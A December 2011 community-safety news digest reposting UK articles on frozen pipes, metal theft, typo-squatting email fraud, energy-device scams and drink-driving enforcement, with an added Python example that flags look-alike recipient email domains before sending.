www.bbc.co.uk

People leaving home for Christmas have been warned to check their pipes which could be at risk of freezing and bursting.

London Fire Brigade (LFB) said there was a direct link between temperatures dropping below zero and an increase in the number of flooding incidents.

The service said the most common cause was pipes freezing, which caused water to expand and pipes to burst.

Last winter, London fire crews dealt with 2,600 floods in people's homes.

On 18 December when the average temperature across the country hit -1C, firefighters were attending, on average, one flooded house every 12 minutes, London Fire Brigade said.

'Ready to respond'
 
Jim Knighton, LFB's assistant commissioner for operational procedures, said as many people would be leaving their homes to visit family, people needed to make sure their pipes were in good shape.

"Frozen pipes can cause devastating damage to people's properties and possessions," he said.

"Our firefighters are ready to respond to any flooding call outs we get but by that stage it's often too late and the damage has been done."

The brigade has four specialist flood response kits, each of which contains rigid flood rescue boats and paddles and rigid floating pontoons, which can be used to make bridges and walkways to rescue people.

Six high volume pumps, which can be used to pump large amounts of water away from flooded areas, are stationed at strategic locations across the city.

(22nd December 2011)


 

CLUBBERS TARGETED IN WIFI INFO OPERATION
(Police Oracle, dated 16th December 2011 author Cliff Caswell)
www.policeoracle.com [Note 1]

Police in London have been using a unique initiative to help partygoers stay safe in the night time economy - by urging them to turn on the Wi-Fi option on their phone.

In the first campaign of its kind launched by the Met's Op Sapphire, the technology is being used in bars and clubs to help deliver rape prevention and personal safety messages.

As well as targeting potential offenders by telling them that having sex with somebody who does not have the ability to consent could end in a rape charge, other messages are giving advice to people to drink responsibly and stay safe.

Officers are focusing the initiative around popular venues within the boroughs of Westminster, Camden, Southwark and Lambeth - including Ministry of Sound, Proud Galleries, The Trocadero Centre and Infernos nightclub.

Posters inviting clubbers to switch on their Wi-Fi have been put up around the venues and alerts are sent to phones with an invitation to download a police message.

Op Sapphire spokesman Det Supt Jason Ashwood said: "This concerted prevention drive is about sending a message to perpetrators of rape that sex with someone who is unable to consent is rape. If a person is unconscious or their judgement is impaired by alcohol they are legally unable to consent.

"This is about us trying to prevent offences from happening. I do however want to make something very clear - the only person ever responsible for a rape is the perpetrator."

In addition to the Wi-Fi initiative, Safer Neighbourhoods Teams, PCSOs and Safer Transport officers are being deployed at venues to hand out leaflets about the initiative.

They are also on hand to provide advice about safety in the night time economy.

(22nd December 2011)

 


 

POLICE METAL THEFT UNIT LAUNCHES IN BEXLEY
(BBC News, dated 19th December 2011)
www.bbc.co.uk

Scotland Yard is launching its first dedicated unit to tackle the growing problem of metal theft.

The crime is believed to cost the economy around £700m a year.

The Waste and Metal Theft Taskforce is based in Bexley, south-east London, one of the boroughs most severely affected because of the high number of scrap metal yards.

The police and the Government last week announced a crackdown to curb the metal theft crisis.

The taskforce includes experts from BT and the local authority's environmental crime unit; it will also advise other boroughs, particularly areas with high numbers of scrap metal yards.

British Transport Police (BTP) said it regards cable theft second only to terrorism in its list of priorities, and a newly formed cross-ministerial group has met several times to discuss the problem.

Operation Ferrous
 
In the first two weeks of December officers carried out 275 inspections and searches of scrap dealer yards.

Fifteen people were arrested for offences ranging from burglary to transporting waste metal illegally without a licence.

Sixteen vehicles were seized as part of Operation Ferrous.

Chief Supt David Chinchen, the Met's lead for Operation Ferrous, said: "Metal theft is not a victimless crime but is causing increasing misery to commuters and householders, and costing millions to the rail industry and local authorities.

"Our latest operation aimed to identify, disrupt and deter those involved in this illegal trade, and acted as an important intelligence-gathering exercise for future operations so that we can target those evading the law and those who supply them even more effectively.

"We are keen to work with legitimate scrap metal dealers, but those who aren't can expect to see regular enforcement."

In one suspect's back garden they found charred remains in an oil-drum suggesting evidence of cable-burning - the process used by metal thieves to extract the lucrative copper from inside.

Regular operations
 
Officers also found one man hauling car metal parts on to the back of his truck, for transport to a scrap metal yard, who had been claiming incapacity benefit since 2008 for a broken leg, pelvis and shoulder.

Acting Insp James Coomber, operational lead for Bexley Waste and Metal Theft Taskforce, said: "Although the majority of scrap metal dealers are legitimate, those who are not are contributing to a thriving illegal trade which we are determined to clamp down on."

Deputy Mayor of London Richard Barnes said the strides Bexley had made with the launch of the taskforce, together with the efforts under the Met-wide Operation Ferrous, delivered "a forceful message to those intent on carrying out such malicious theft and sabotage that it will not be tolerated".


 

PART OF THE PROBLEM

SCRAP METAL THEFT ON SAME LEVEL AS DRUG SCENE (Extract)
(BBC News, dated 14th December 2011 author Tom Edwards)

Full Article : http://www.bbc.co.uk/news/uk-england-london-16163742

It shows for the first time the full scale of the problem for commuters in London and the South East although it's not the worst hit region.

How many hours of delays have been caused by metal theft?
2011 - 949 hours (40 days)

2010 - 237 hours (10 days)

2009 - 148 hours (six days)

That shows nearly a 700% increase in delays.

How much compensation has been paid out (to train companies) due to metal theft?

2011 - £3,608,892
2010 - £1,175,252
2009 - £373,799

That's nearly a 1,000% increase.

How many incidents of metal theft have there been?

2011 - 104
2010 - 71
2009 - 40

That's a 260% increase in incidents.

So what can the British Transport Police (BTP) do to try to stop this? The BTP is very clear that things need to change when it comes to legislation. Under the Scrap Metals Dealers Act (1964) they are allowed to enter scrapyards without warning.

The Act requires all scrap metal dealers to be registered with their local authority and obliges them to maintain records of all transactions relating to scrap metal received and processed. The penalties imposed for failure to comply are fixed fines. The fines are simply not high enough to deter someone who is currently able to get a very good price for scrap metal.


(22nd December 2011)


 

EVERY DEATH ON EVERY ROAD IN GREAT BRITAIN 1999 - 2010
(BBC News website)

Full Article : www.bbc.co.uk/news/uk-15975720

Note : The full article contains access to the data for the 36,371 people who were killed, via Postcode.

Britain has one of the best records in the world for road casualties. However, hundreds still die on the roads every year. In 2010, the police recorded 1,850 deaths, 22,660 people seriously injured and 184,138 who received light injuries.

About the map: Using official data recorded by police in Great Britain between 1999 and 2010, we have plotted every road collision in which someone died. In all, 36,371 fatalities are marked on this interactive map. You will also find partial data for Northern Ireland, for 2004-2009.

How the data is gathered: Detailed information about each crash is recorded by the police at the scene. It is subsequently transferred onto a computer database. This is available to researchers from the Economic and Social Data Service.

Every time a road traffic collision is reported to the police in which someone is either injured or dies, the police record details of the incident on a special form, known as STATS19. The police record many details including when and exactly where the crash took place, in what weather, on what class of road and whether it was close to a junction, a school and so on. All of this data is collated every year. The Department for Transport releases quarterly headline figures based on this data and once a year, a full annual report.

The data comes from police records dated between 1999 and 2010. The information is recorded by police at the scene of a crash. The data is then transferred onto a computer database. As with any large collection of data, there will be some errors and duplicates in the information and these will appear on our map. In addition, the circumstances may have changed since the information was recorded or more accurate information may have come to light.

With regard to the missing incidents, there are 86 fatal collisions in the police data made available to us that have incomplete information. For this reason, we have been unable to include them in the map.

Missing data: As with any large collection of data, there will be errors and omissions. The BBC apologises for any distress or offence that may be caused by the inclusion of these errors.

(16th December 2011)




IT'S MORE THAN TRAINS THAT ARE GETTING DELAYED, PATIENTS ARE AS WELL !

 

TRACKING DOWN LONDON'S METAL THEFT DEALERS
(BBC News, dated 14th December 2011 author Guy Lynn)

Full Article : www.bbc.co.uk/news/uk-16165179

Rogue scrap dealers willing to launder stolen metal in a trade worth millions of pounds, have been exposed in a BBC London investigation.

Figures obtained by BBC London reveal the scale of the effects of the illegal trade on rail commuters in London and the south east, with delays rising by 700% in the last three years.

Metal theft is a huge illicit business due to rising metal prices on world markets.

British Transport Police (BTP) have prioritised the problem as "second to terrorism" and there is mounting pressure to update legislation that is seen as outdated and ineffectual.

The Home Office is considering measures to tighten the regulation of scrapyards and a growing number of MPs are calling for a ban on cash transactions, which make it hard for police to track down stolen metal.

In 2009, Network Rail figures show rail operators in the South East suffered 148 hours of delays and were paid £373,799 in compensation as a direct result of metal thefts.


 

COPPER THIEVES HALT 100 HOSPITAL OPERATIONS AFTER STEALING POWER CABLES FROM GENERATOR
(Daily Mail, dated 14th December 2011 author Luke Salkeld)
www.dailymail.co.uk [Note 1]

A hospital was forced to cancel almost 100 operations yesterday after copper thieves stole cables used to keep a vital back-up power generator working.
Doctors put procedures on hold and will now have to carry out dozens of extra operations a day in the run up to Christmas following the raid of more than 300ft of copper wiring.
The Llandough Hospital, in South Wales, also faces costs running into many tens of thousands of pounds from lost equipment and wasted hours.

The stolen metal, meanwhile, is said to be worth just 'a few hundred pounds' in scrap.

The shocking theft is the latest in a series of metal theft raids across Britain, many of which are said to be putting lives at risk.
Organised gangs, cashing in on the surge in the price of copper, are knocking out crucial communications by stealing the copper cables the systems use, affecting emergency services and transport safety.

At Llandough, in Penarth, near Cardiff, the cancelled operations included treatment of eight cancer patients, two of whom are suffering from breast cancer.
Hospital bosses said the theft was 'dangerous and irresponsible' and confirmed that 81 patients were affected.

Back-up generators are crucial to hospitals because they guarantee life and death services remain running in a power cut.
And although the main generator was unaffected, South Wales has been experiencing stormy weather, and officials decided that they could not operate on patients without back-up in place.
A relative of an affected patient said of the theft: 'It's disgusting, I don't know how anyone would be cold-hearted enough to steal from a hospital.
'They are putting people's loved ones at risk for the sake of some scrap metal.'
The theft at the 423-bed hospital, which specialises in cancer and orthopaedic treatment, but does not carry out emergency surgery, was discovered on Tuesday afternoon during a routine inspection.
A replacement back-up generator was fitted yesterday and last night a spokesman for the hospital confirmed that normal surgical activity would resume today.
Jan Williams, chief executive of the Cardiff and Vale University Health Board, said: 'NHS staff work tirelessly to care for some of the most vulnerable members of our communities.
'It is depressing to note that, for these thieves, the monetary value of copper is of more consequence.'

Deputy chief executive Paul Hollard said: 'It beggars belief that anyone could stoop so low as to potentially put patients' lives at risk in this way.'
South Wales Police are investigating and have appealed for information from anyone offered the copper as scrap.
Last month, it was reported that thieves had stolen street lighting cabling, causing blackouts on major roads. And coastguards' communications were cut off for 36 hours after aerial signals were cut by metal thieves. Thieves have also disrupted the radio system used by emergency services including the Metropolitan Police, fire and ambulance services.
Detective Sergeant Chris Hearn, of the British Transport Police metal task force, said: 'They are obviously endangering lives.'
The price of scrap copper and other metals, such as iron and aluminium, has soared as fast-expanding economies in the emerging world buy up huge quantities.

(15th December 2011)


 

SO YOU THINK YOU ARE AN ACCURATE TYPIST ?

Just rushing to type in an e-mail or website address may result in you becoming a victim of fraud. Once you get to any website, if you are going to enter any form of personal information ensure that the "http" is replaced by an "https" and that a small padlock symbol appears somewhere on your screen.

The following two articles describe some examples of this type of fraud.

ID THEFT WARNING OVER SPELLING MISTAKES ON EMAILS
(This is Money.co.uk, dated 14th September 2011 author Dan Hyde)

Full article [Note 1]  :

www.thisismoney.co.uk/money/article-2037376/Typo-squatting-ID-theft-warning-spelling-mistakes-emails.html

Just one mistake in an email can leave you vulnerable to fraud by cunning cyber-criminals, researchers have found.

Simply missing out the dot in the email address bar can see your messages intercepted by fraudsters in a stealthy trick called 'typo squatting'.

In a six month investigation, two researchers at security think tank Godai Group managed to intercept 120,000 wrongly-addressed emails that would otherwise have been lost in cyberspace.

The messages contained personal details, user names, passwords and other sensitive information.

The research follows an admission by Barclays that fraudsters stole £20,000 from two pensioners' current accounts by obtaining personal details.

The criminals used mysteriously-obtained security question answers to dupe the bank's call centre staff into changing the registered address for the two pensioners' accounts and then send out new debit cards. Barclays has reimbursed the customers since BBC Radio 4's Moneybox programme exposed the scam.

The Barclays con-job could easily have been kicked off using the sort of 'typo-squatting' techniques exposed by Godai Group's Peter Kim and Garrett Gee.

Simplest of crimes

The researchers bought 30 domain names that were almost identical to those used at major US businesses like Microsoft, Nike, PepsiCo and Dell. They were identical but for one crucial difference - a missing dot. While many firms use web addresses such as companyname.com, many have 'subdomains' that use dots, such as us.companyname.com.
They snapped up 30 of these subdomains, known as 'doppelgangers' in IT circles. A hypothetical example might be ceo@uscompanyname.com, rather than the genuine address of "ceo@us.companyname.com". They then sat back and watched 20 gigabytes of data fall into their laps over six months as, time and again, internet users omitted the dot from a private email.



CONSUMERS FACE "TYPO" NEGATIVES
(Metro, dated 13th December 2011)
www.metro.co.uk   [Note 1] 

Fraudsters are exploiting spelling errors made by online Christmas shoppers to steal bank details and sell them goods they will never receive.

"Typo-Squatters" have set up websites that pop up when customers misspell the names of high street retailers.

Security experts have found almost 2000 sites that mirror popular shopping sites such as Argos, Debenhams, and John Lewis to fool unsuspecting shoppers.

Even if users do not enter their personal information, the sites can infect their machines with bugs.

Typo-Squatting also puts companies' confidential data at risk as many employees shop from work computers at lunchtime, said Elad Sharf, from Websense Security Labs.

(15th December 2011)
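
The missing-dot "doppelganger" described in the first article and the misspelled shop names in the second can both be screened for before a message leaves. The following is an added example, not taken from either article: `LEGIT_HOSTS`, the function names and every sample address are assumptions constructed for illustration, and the single-typo check generalises beyond the missing-dot case.

```python
from email.utils import parseaddr

# Constructed inventory: legitimate mail host -> its registrable domain.
# "us.companyname.com" is the article's hypothetical; the rest is made up.
LEGIT_HOSTS = {
    "us.companyname.com": "companyname.com",
    "mail.uk.companyname.com": "companyname.com",
}


def doppelganger(host, registrable):
    """Return the look-alike domain a third party could register by dropping
    the dot that joins the last subdomain label to the registrable domain."""
    host = host.lower().rstrip(".")
    registrable = registrable.lower().rstrip(".")
    suffix = "." + registrable
    if not host.endswith(suffix):
        return None  # bare or unrelated domain: there is no dot to drop
    label = host[: -len(suffix)].split(".")[-1]
    return label + registrable if label else None


def one_typo(a, b):
    """True if a differs from b by exactly one inserted, deleted, substituted
    or adjacent-swapped character (the slips a hurried typist makes)."""
    if a == b or abs(len(a) - len(b)) > 1:
        return False
    i = 0
    while i < min(len(a), len(b)) and a[i] == b[i]:
        i += 1  # skip the shared prefix
    ra, rb = a[i:], b[i:]
    if len(ra) == len(rb):
        swapped = (len(ra) >= 2 and ra[0] == rb[1] and ra[1] == rb[0]
                   and ra[2:] == rb[2:])
        return ra[1:] == rb[1:] or swapped
    longer, shorter = (ra, rb) if len(ra) > len(rb) else (rb, ra)
    return longer[1:] == shorter


def classify(address):
    """Return (verdict, intended_host) for one recipient address."""
    addr = parseaddr(address)[1]
    if "@" not in addr:
        return ("unparseable", None)
    domain = addr.rpartition("@")[2].lower().rstrip(".")
    registrables = set(LEGIT_HOSTS.values())
    known = set(LEGIT_HOSTS) | registrables
    # Anything at or under our own registrable domain stays inside our DNS.
    if domain in known or any(domain.endswith("." + r) for r in registrables):
        return ("ok", None)
    for host, reg in LEGIT_HOSTS.items():
        twin = doppelganger(host, reg)
        if twin and (domain == twin or domain.endswith("." + twin)):
            return ("missing-dot", host)
    for good in sorted(known):
        if one_typo(domain, good):
            return ("typo", good)
    return ("external", None)


if __name__ == "__main__":
    # Constructed recipients, as they might appear in an outbound mail queue.
    for rcpt in ["ceo@us.companyname.com",
                 "Boss <ceo@uscompanyname.com>",
                 "ops@mail.ukcompanyname.com",
                 "hr@compnayname.com",
                 "friend@example.org"]:
        print(f"{rcpt:32} {classify(rcpt)}")
```

A mail gateway could hold "missing-dot" and "typo" recipients for confirmation, and the same `doppelganger` output is the list of names an organisation would want to register or monitor itself.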


TRADING STANDARDS INSTITUTE WARNS OF DANGEROUS ENERGY SAVING SCAM TARGETING ELDERLY
(Trading Standards Institute, Press Release dated 1st December 2011)
www.tsi.org.uk

Distributed by : Metropolitan Police neighbourhood link (received 13th December 2011)

Trading Standards Institute is urging consumers to be aware of rogue telephone cold callers offering energy saving devices after trading standards up and down the country reported hundreds of complaints.

Trading standards are currently dealing with more than 200 complaints about people claiming to be their energy supplier or working in partnership with them, offering a plug in device which they say can save them 40 per cent off their energy bills.

Trading standards have had a number of the items tested which not only failed to satisfy electrical safety standards but do not deliver any tangible energy savings.

Ron Gainsford from the Trading Standards Institute said: "Consumers are warned not to use the product as they pose a risk of fire and electrocution and a safety recall has been issued for the items traced so far.
"Unscrupulous criminals are using the rising energy prices as an opportunity to lure in cash strapped consumers - elderly people seem to have been deliberately targeted.
"The number of complaints we are currently dealing with is bound to be only the tip of the iceberg."

Westminster trading standards have been investigating the scam as the caller gives a London W1 Oxford Street address for the company. Sue Jones from Westminster trading standards said: "The address they give is that of a virtual office provider, the companies involved in these scams are not actually situated there - we believe the call centre they use is based abroad and the appliances appear to be distributed by a number of individuals in the UK. "We know that these fraudsters have been duping consumers across the country into paying £99 for the energy saving device and have been told the caller always appears to be very credible by already knowing the consumers' details, their energy supplier and sometimes some or all of the digits of their credit/debit card. "Often consumers do not realise that they have been defrauded until they receive the dodgy looking device with instructions in broken English and the accompanying invoice which names an unknown supplier and often gives an American address."

So far four different suppliers have been named, 1 Stop Marketing Solutions, ITC Development Corp, Power Saver and Athico Ltd. but the fraudsters could be operating under other names too. Some of these names could be very similar to genuine companies - for example Power Saver Ltd, based in Tonbridge, Kent is not involved in this fraud. The director of Athico Ltd appears to have been a victim of the scam himself. He fully cooperated with trading standards and the company has now ceased trading.

Advice to consumers

If consumers have responded to one of these cold calls they should report the matter to Action Fraud on www.actionfraud.org.uk 0300 123 2040 or Consumer Direct on 08454040506. They should also contact their bank to stop their debit/credit card. If a device has been received they should not use it and dispose of it carefully.
Consumers should be cautious about giving out any personal or financial information. They should independently verify a caller's identity before agreeing to purchase any goods or services.

(15th December 2011)


POLICE CHECK JUST ONE IN SEVEN FOREIGN CRIMINALS RECORDS, EVEN AFTER THEY ARE ARRESTED
(Daily Mail, dated 7th December 2011 author Jack Doyle)
www.dailymail.co.uk  [Note 1]

Police are failing to check the criminal histories of tens of thousands of foreign offenders - even after they are arrested in the UK. Officers request details from a suspect's home country in just one in seven investigations involving EU nationals, according to a Home Office review.
And each year, around 30,000 foreign offenders who pass through the courts do so without anyone knowing the full extent of their criminal past.

Judges are therefore unaware if the offender they are sentencing is a convicted rapist, murderer or paedophile - or someone with no criminal history at all.
In the worst cases, it could mean the alert is not sounded when dangerous offenders wanted on the continent are picked up in Britain. Without information on their criminal past, an offender could face a much shorter sentence, be bailed even though they present a threat to the public or escape deportation.

Details of the way officers are failing to carry out even basic checks emerged in a Home Office review of criminal records systems.
Sunita Mason, the independent advisor on criminal records in England and Wales, said: 'It is clear that we should be making such checks routinely when EU nationals are arrested and charged.
'Even minor offending in the UK might lead to the disclosure of much more serious offending overseas.'
Under EU data-sharing rules, officers can ask to see the records of any EU nationals they arrest.

Of the 35,000 EU nationals charged with criminal offences in England and Wales last year, checks were ordered on just 5,500.
A similar proportion - 15 per cent - of the EU nationals arrested in this country had their criminal histories explored.
Astonishingly, police may not even be aware they can request the records, the report found. Miss Mason also warned funding for the UK body which handles requests to foreign forces is in doubt. She said: 'To not address this issue is a potentially huge public protection risk.'

The same report showed EU countries alerted the UK to 20,000 Britons convicted of crimes overseas. That includes 450 Britons convicted of serious violent or sexual offences and 276 criminals who committed offences against children. Just 37 were already known to the UK authorities.
The Association of Chief Police Officers said many offenders refused to say where they were from or lied about their nationality, making it difficult for officers to find out about their past.
The 'free movement' directive means it is virtually impossible to stop EU citizens with criminal convictions from entering Britain. Even in cases where officials are aware of serious convictions, criminals cannot automatically be turned away.

Regulations say they can be barred to maintain public security, but 'convictions in themselves do not constitute grounds for taking such measures'.
In reality, they allow all but the very worst criminals free access to the UK.
Just two weeks ago a Latvian axe-killer was jailed after running down an innocent woman while drink-driving.
Police had no idea Intars Pless, 34, was a convicted murderer and living in the UK until February this year when he ran his car straight into moped rider Valentina Planciunene, who died on the road.
A Home Office spokesman said: 'It is an operational matter for police to decide when to request information on foreign nationals.
'The UK worked hard to implement an EU-wide agreement to share this information - but we know all countries do not currently comply fully. 'That is why it is important that the new European legislation implemented next spring will require member-states to share this information.'

(15th December 2011)


 

WELCOME TO ENFIELD

If you are looking for shops; you will be pleasantly surprised by the range in Enfield Town. If you are after supermarkets there are 3 just off of the A10; along with a JB Sports, Toys R Us, Comets, Halfords, Argos and PC World / Currys. All of these are within the Southbury Ward of the London Borough of Enfield.

Along with this excellent shopping if you happen to be driving illegally within the area you may also experience the long arm of the law. For example during the month of November the Safer Neighbourhood Team had the following results.

 
108 vehicles were stopped and the drivers received a variety of points. Of the 108, the breakdown is as follows :

56 x speeding  = 3 penalty points and £60- fine.
22 x using handheld mobile phone whilst driving = 3 penalty points and £60- fine.
15 x No Insurance, 6 penalty points and £200- fine.
7 x Driving not in accordance with a licence, 3 penalty points and £60- fine.
4 x Contravening no entry signs, 3 penalty points and £60- fine.
2 x Contravening red traffic lights, 3 penalty points and £60- fine.
1 x overtaking on zebra crossing, 3 penalty points and £60- fine.
1 x driving without due care and attention, processed to court and if convicted, likely to receive 6 penalty points.

In addition

- Twenty vehicles were seized as part of Operation reclaim. 
- Nineteen drivers peeled off their illegal tints rather than accepting 3 penalty points and £60- fine.
- Six drivers were issued tickets for not wearing a seatbelt, £60- fine.
- Two drivers were issued tickets for having illegal number plates, £60- fine.
- Three robbery arrests were made when the Police Officers were en route to do some work when a robbery took place nearby. The stolen property was recovered and one of the 3 youths arrested was also arrested for a robbery the day before.
- Two males were stopped on separate days and were both arrested for Unauthorised taking of a motor vehicle.

HAVE A MERRY CHRISTMAS AND DON'T DRINK AND DRIVE......TAKE A LICENSED TAXI !

(11th December 2011)




BRITISH RED CROSS LAUNCHES FREE FIRST AID APP
(British Red Cross website, dated 8th December 2011)
www.redcross.org.uk

 

The British Red Cross will empower smartphone users worldwide to act in an emergency, with the launch of its new mobile app.

The Red Cross' free app features simple, easy-to-understand advice on 18 everyday first aid scenarios, as well as tips on how to prepare for emergencies, from severe winter weather to road traffic accidents.

Joe Mulligan, head of first aid education aid, said: "If a friend or family member had a heart attack or choked, would you know how to help them? With this mobile app anyone can have life-saving skills at their fingertips. It revolutionises the way we learn first aid."

Available for Apple, Android and Blackberry, the app includes videos, interactive quizzes and simple step-by-step advice. The information is all hosted on the app itself, meaning no internet connection is needed, making it fast and easy to access.

An essential app for your smartphone

In user testing, the app has been described as "fun", "important" and "impressive", and been greeted with exclamations of "I can't believe it's free" and "when can I get this on my phone?" The answer is now. Be one of the first to get this essential app on your smart phone and don't forget to tell your friends and family about it too - by sharing this app, you can help save lives.

The Apple and Android versions are available to download now and the BlackBerry version will follow in a few days' time.

First Aid at your fingertips

If a friend or family member was having a heart attack or was choking, would you know how to help them? The free app features simple, easy advice on 18 everyday first aid scenarios, as well as tips on how to prepare for emergencies, from severe winter weather to road traffic accidents.

With videos, interactive quizzes and simple step-by-step advice, it's never been easier to learn first aid.

The information you need is all hosted on the app itself, meaning no internet connection is needed, making it fast and easy to access. Best of all, it's free. Get this essential app on your smartphone now.

For details of the download

http://www.redcross.org.uk/What-we-do/First-aid/Mobile-app

(11th December 2011)


 

STALKER TREATMENT CENTRE LAUNCHED
(BBC News, dated 8th December 2011)
www.bbc.co.uk

A new medical service for England and Wales specialising in treating stalkers is due to be launched.

The National Stalking Clinic is believed to be the first of its kind in the world.

According to the British Crime Survey one-in-five women and one-in-10 men aged 16 or over have been victims of stalking in its various guises.

BBC home affairs correspondent Danny Shaw said until now stalkers were prosecuted but not treated.

Dr Frank Farnham, a consultant psychiatrist who has helped set up the new service, said: "If we can treat stalkers, then we can save lives. "There is great need for a co-ordinated national service that can provide specialist advice and treatment. "The psychological impact on victims is corrosive, with many suffering months and, in some cases, years of harassment leading to a variety of illnesses including anxiety, depression and post-traumatic stress.

'Mentally draining'
 
"Victims live in a permanent state of hyper-alertness which is physically and mentally draining."

Our correspondent said offenders who made unwanted phone calls, sent unsolicited emails, followed or harassed the objects of their affections were usually subject to restraining orders. But under the new approach courts will be able to refer stalkers for assessment, treatment and rehabilitation. They will be dealt with by a team of medical experts based at Chase Farm Hospital in Enfield, north London.

Doctors running the service say an 18-month course of treatment will cost up to £10,000 but they claim it will be cheaper and more effective than a short prison sentence. But Dr Farnham said a typical assessment could cost between £1,500 and £2,000 and would be paid for by the court which sentenced the individual.

'Devastating'
 
Alexis Bowater, chief executive of UK charity Network for Surviving Stalking, said: "The launch of this clinic is a groundbreaking move and makes the UK one of the world leaders in tackling this devastating crime.

"The treatment and rehabilitation of stalkers is vital if we are to stop lives being lost to stalking."

Home Office minister Lynne Featherstone said: "I'm pleased to support the launch of this unique clinic that aims to prevent stalkers from reoffending.

"I've made stalking one of my priorities and it's included in the government's report Call To End Violence Against Women and Girls.

"We're also asking people for their views on how the police should tackle this devastating crime and whether current laws are adequate," she added.

(11th December 2011)


 

UK BORDER STAFF IN ARREST THREAT OVER "LILLE LOOPHOLE"
(BBC News, dated 8th December 2011 author Simon Cox)
www.bbc.co.uk

British border staff have faced threats of arrest by Belgian police for trying to stop people exploiting a loophole allowing them to enter the UK without passport checks, the BBC has learned.

Passengers can travel from Brussels to Lille without showing passports as Belgium and France are both within the Schengen area. But they can then stay on the train to the UK as there are no further checks. The Home Office confirmed it was working to tackle the "Lille loophole".

Leaked emails
 
The Schengen agreement allows passport-free travel between some European countries, but the UK is not a signatory.

Passengers with tickets from Brussels to Lille can board the train to London without showing a passport, but no-one checks whether passengers actually get off the train at Lille and UK Border staff do not perform checks on board. So passengers can continue on to London St Pancras, without going through further passport control, and illegally enter the country.

Radio 4's The Report has seen internal UK Border Agency (UKBA) correspondence highlighting the loophole, and the threats being made to staff trying to tackle it.

One UKBA officer describes an incident in April at a Brussels station where he stopped two Iranians who he said "bore all the hallmarks of Lille loopholers". After they were questioned the Belgian police intervened.

One officer shouted: "This has got to stop. You are not in Britain now, you are in Schengen. If they make a complaint you will be arrested."

The BBC has seen other emails describing clashes this year between UK Border Agency staff and Belgian federal police.

This led one officer to warn that many staff he had spoken to were so scared of being arrested by the Belgian police that they "will now turn a blind eye to potential Lille loopholers".

The issue has been discussed at the highest levels of the UK Border Agency and the Foreign and Commonwealth Office.

An email from a senior director to staff in May this year stated that the British Ambassador to Belgium had "voiced UKBA concerns on border controls for Lille passengers" to the Belgian immigration minister.

The Home Office minister Damian Green confirmed that both he and the Home Secretary Theresa May are aware of the loophole.

"Any loophole in our border defences is a matter of concern," he told The Report.

"It's one of those things that the British government can't solve on its own… that has to be solved in negotiations, and that's what we're now doing."

He added: "There are strict British immigration controls in place in France and Belgium and we have UK Border Agency officers based at St Pancras to target those we believe are intent on entering Britain illegally.

"We are currently working closely with our Belgian counterparts and Eurostar to resolve this as quickly as possible."

The government could not say when the loophole will be closed or how many people had exploited it.

The chairman of the Home Affairs select committee Keith Vaz told the BBC he was "astonished" by news of the loophole, and by the government's response to it.

"The minister is taking what appears to be a very casual approach to this very serious issue," he said.

He said he would question Jonathan Sedgwick, the acting chief executive of the UK Border Agency, about the matter when he appears before the select committee later.

"If a simple railway ticket can give you entry into the UK, this is a cause for real concern," he added.

Schengen Area Agreement

http://europa.eu/legislation_summaries/justice_freedom_security/free_movement_of_persons_asylum_immigration/l33020_en.htm

(11th November 2011)


 

WEBSITE TO MONITOR GPs IN LONDON LAUNCHED
(BBC News, dated 8th December 2011)
www.bbc.co.uk

Residents in London will now be able to see how well their local GP is doing as a website which monitors doctors' performances is launched.

The My Health London website will show GP standards such as screening rates and patient approval scores.

NHS London said the project was aimed at improving GPs' services.

The British Medical Association (BMA) said the information was meaningless without an understanding of the demographics the GP practice works in.

NHS London said it hoped the website would "create an information hub that would constantly be developed like an online newspaper focusing on health issues for Londoners".

It said it would help residents find out how their practice performs against standards such as childhood immunisations and cervical screening as well as how they compare to other GP practices.

'Informed decisions'
 
Dr Phil Koczan, a GP based in Chingford, north-east London, said as healthcare needs vary widely across London, it was hoped that GPs would learn from colleagues in other practices.

Each practice will have its own webpage which can be customised to keep people informed of clinics and services and it will also enable patients to provide feedback.

If the London trial is successful, it will then be rolled out across the rest of England and Wales.

Dr Richard Vautrey, deputy chair of the BMA's GP committee, said information about GP practices such as referrals and prescribing information was already publicly available, however it is not collated together or easily accessible.

He said the problem with the information was unless people understood an area the practice worked in, then the prevalence of certain diseases could differ markedly according to the lifestyle and occupation of the local population.

"We would therefore be very concerned if this information was used to create league tables that would mislead patients rather than better inform them," he said.

Mayor of London Boris Johnson is backing the project.

Ahead of its official launch, he said: "Few decisions are as critical as those affecting our health and that of our family and friends.

"To make informed decisions, it is of paramount importance that we are armed with sensible information."

My Health London website : www.myhealth.london.nhs.uk

(11th December 2011)


 

DRINK-DRIVE : CAUGHT TO COURT IN NINETY MINUTES
(Kent Police, dated 2nd December 2011)
www.kent.police.uk

People caught drink driving in Kent could lose their licence within hours of sobering up.

Kent Police will be using virtual court technology to put those charged with driving under the influence of alcohol or drugs before magistrates immediately. This means that people risk losing their licence on the day they are charged.

The announcement comes as Kent Police launches its seasonal road safety campaign to deter people from drink driving. Officers will be taking a zero tolerance stance on those who are found to be over the limit.

Once charged, the motorist will appear in front of a magistrate, often via the virtual court video link. If they are found to be guilty then the magistrate has the power to ban the defendant from driving. This takes immediate effect.

The use of virtual courts was trialled as part of the drink-drive crackdown last year (1 December 2010 to 1 January 2011) with 17 people appearing before a magistrate via the high tech video network. In one case a motorist was banned from driving no less than 90 minutes after being charged with driving under the influence of drink.

DCC Alan Pughsley explains: "Usually motorists will be charged with drink driving and be bailed to appear before the court some weeks later. This means until a guilty verdict is reached they are free to drive.

"The use of the virtual court system means that the defendant risks losing their licence on the day of charge."

As the party season begins officers will be conducting stop checks, targeting those who may be driving under the influence of alcohol or drugs. The checks will also involve examining the safety of the vehicle and ensuring any passengers are wearing seatbelts.

DCC Pughsley continued: "Our message is simple, if you are driving, stay sober and alert - or risk losing your licence.

"Before getting behind the wheel ask yourself 'is it worth it?' The consequences of drink driving are severe. You could kill yourself or an innocent party, you risk losing your job and your reputation.

"Driving under the influence of alcohol or drugs is selfish and anti-social. In addition to being banned from driving you could receive a criminal record and a fine of up to £5,000."

Kent Police is advising people to carefully plan their journeys and book a taxi, use a designated driver or public transport if you are going to drink. It is recommended that if you are driving you refrain from drinking any alcohol at all and people are asked to think about medication they may be on.

Some prescription drugs can increase the danger of a collision if you have been drinking even the smallest amount of alcohol.

DCC Pughsley added: "Around two people are killed in collisions on Kent's roads each week. Of these, statistics show that one in six of those deaths involve someone driving under the influence of drink or drugs. I would like to urge people to think about their actions, stay safe and be responsible."

The campaign will run from 1 December 2011 to 1 January 2012.

(6th December 2011)


 

LAUNCH OF ANTI-WEAPONS CAMPAIGN
(Courtesy of : Metropolitan Police, dated 5th December 2011)
